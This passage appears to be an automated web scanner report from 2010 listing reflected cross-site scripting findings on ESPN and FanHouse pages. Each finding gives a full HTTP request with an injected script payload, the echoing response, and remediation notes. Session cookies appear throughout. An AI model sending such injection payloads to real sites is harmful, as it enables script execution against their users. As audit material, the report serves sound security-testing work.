GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickema6c58"%3balert(1)//be026dd05fd HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:08 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 14:29:28 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2910
The value of the player request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e261'%3balert(1)//073d4ffc633 was submitted in the player parameter. This input was echoed as 6e261';alert(1)//073d4ffc633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame096e261'%3balert(1)//073d4ffc633&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:34 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 14:26:54 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3022
The value of the player request parameter is copied into a JavaScript rest-of-line comment. The payload 79c55</script><script>alert(1)</script>f04c1eba61f was submitted in the player parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 14:27:02 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3132
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c16e'%3balert(1)//7133253776d was submitted in the width parameter. This input was echoed as 4c16e';alert(1)//7133253776d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=4324c16e'%3balert(1)//7133253776d&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:56 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 14:28:16 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3106
2.17. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasyfootball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5646c"-alert(1)-"bc0ed5df7f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5646c"-alert(1)-"bc0ed5df7f8=1 HTTP/1.1 Host: fantasyfootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b83e1<script>alert(1)</script>d5ce256c82c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:27 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9679<script>alert(1)</script>3c99b6ca0a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:32 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bdc<script>alert(1)</script>182530dbb64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64 HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:35 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a89ef<script>alert(1)</script>59ae141c417 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:34 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1cb<script>alert(1)</script>4c687beadc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:37 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd44f<script>alert(1)</script>1c2bc0e9cef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:41 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b155<script>alert(1)</script>4134dc3e7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage7b155<script>alert(1)</script>4134dc3e7cb HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage7b155<script>alert(1)</script>4134dc3e7cb</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f36c<script>alert(1)</script>45bed4dd97c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7707<script>alert(1)</script>fed908440a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage/basketballb7707<script>alert(1)</script>fed908440a5 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage/basketballb7707<script>alert(1)</script>fed908440a5</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd1f8<script>alert(1)</script>3870a2a6f26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; 